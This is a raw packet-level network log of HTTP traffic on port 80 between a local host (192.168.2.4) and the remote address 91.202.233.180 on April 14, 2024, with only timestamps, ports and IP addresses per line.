Apr 14, 2024 08:45:42.716932058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.717223883 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.717358112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.717766047 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.717854977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.718450069 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.718579054 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.720343113 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.720563889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.720563889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.720979929 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.721081972 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.721604109 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.721770048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.721828938 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.721946001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.722026110 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.722544909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.722912073 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.723170042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.723575115 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.723731995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.724263906 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.724423885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.725472927 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.725616932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.727691889 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.727956057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.729239941 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.729341030 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.729712963 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.729731083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.729731083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.729867935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.730180979 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.730263948 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.730292082 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.730345964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.731055021 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.731163025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.731556892 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.731858969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.732086897 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.732332945 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.732430935 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.732477903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.732506990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.732641935 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.732759953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.733114004 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.733189106 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.734035969 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.734071970 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.734163046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.734194994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.734250069 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.734328985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.734563112 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.734628916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.734905958 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.735013008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.735486031 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.735570908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.735968113 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.736076117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.736624956 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.736658096 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.736690044 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.736704111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.736726999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.736748934 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.736814022 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.736905098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.737155914 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.737236977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.737947941 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.738039970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.738410950 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.738581896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.740274906 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.740372896 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.740454912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.740555048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.741070986 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.741174936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.741745949 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.741842985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.741936922 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.742048025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.742593050 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.742698908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.743143082 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.743206024 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.743278980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.743331909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.743683100 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.743814945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.744409084 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.744498968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.745213985 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.745249987 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.745333910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.745369911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.746121883 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.746270895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.747363091 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.747577906 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.747694969 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.747757912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.748532057 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.748637915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.748728037 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.748811960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.749567986 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.749675035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.750036001 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.750113010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.750777006 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.750874043 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.751370907 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.751405001 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.751449108 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.751528025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.751668930 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.751746893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.752155066 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.752237082 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.753411055 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.753518105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.754106998 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.754185915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.754220963 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.754309893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.754910946 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.754991055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.755218983 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.755307913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.755759001 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.755791903 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.755908966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.757373095 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.757412910 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.757534027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.757572889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.760258913 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.760392904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.760788918 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.761030912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.761523008 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.761670113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.762223959 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.762389898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.762670994 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.762744904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.763128996 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.763223886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.763914108 CEST	49740	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.764202118 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.764265060 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.764307022 CEST	49742	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.764404058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.764827967 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.764942884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.765537977 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.765630960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.765862942 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.765944004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.766066074 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.766146898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.766782999 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.766901970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.767853022 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.767966986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.771517992 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.771552086 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.771861076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.771861076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.771935940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.772032976 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.772150993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.772253990 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.772293091 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.772334099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.772367954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.772691965 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.772770882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.781014919 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.782023907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.782392025 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.782454014 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.782618999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.782619953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.783536911 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.786153078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.794290066 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.794517994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.798938036 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.800165892 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.800538063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.801050901 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.801251888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.801351070 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.802166939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.802480936 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.802515030 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.802541018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.802570105 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.802601099 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.802603960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.802644014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.802691936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.802911043 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.802946091 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.803004980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.803036928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.803471088 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.804131985 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.804276943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.804331064 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.804364920 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.804419994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.804454088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.804801941 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.804944038 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.805031061 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.805037022 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.805111885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.805351973 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.805418015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.805723906 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.805799961 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.806158066 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.806807041 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.806927919 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.807015896 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.807092905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.807559967 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.807627916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.807950974 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.807985067 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.808022022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.808054924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.808506012 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.808836937 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.808870077 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.808934927 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.808965921 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.809382915 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.809664965 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.809776068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.809818029 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.809851885 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.809887886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.809922934 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.810080051 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.810153008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.810374022 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.810447931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.810679913 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.810741901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.810843945 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.810915947 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.811003923 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.811085939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.811116934 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.811151981 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.811186075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.811220884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.811330080 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.811680079 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.811805964 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.812103033 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.812345028 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.813038111 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.813119888 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.813940048 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.814300060 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:42.828154087 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.051099062 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.051877975 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.053318024 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.054210901 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.056051970 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.057420015 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.059535980 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.062443018 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.062529087 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.064922094 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.064979076 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.066560030 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.066854954 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.068124056 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.069147110 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.070468903 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.073957920 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.075223923 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.076745987 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.080118895 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.081203938 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.083658934 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.085938931 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.086029053 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.086061001 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.086097002 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.087950945 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.088015079 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.088047981 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.088083029 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.089787960 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.089823961 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.090231895 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.093379021 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.093446970 CEST	80	49740	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.093929052 CEST	49740	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.093939066 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.095093966 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.095134020 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.095166922 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.097078085 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.097131014 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.097167969 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.097857952 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.097990036 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.098201036 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.099849939 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.100135088 CEST	80	49742	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.100601912 CEST	49742	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.101675987 CEST	49742	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.104258060 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.104294062 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.104614973 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.104648113 CEST	80	49741	91.202.233.180	192.168.2.4
Apr 14, 2024 08:45:43.104682922 CEST	80	49741	91.202.233.180	192.168.2.4
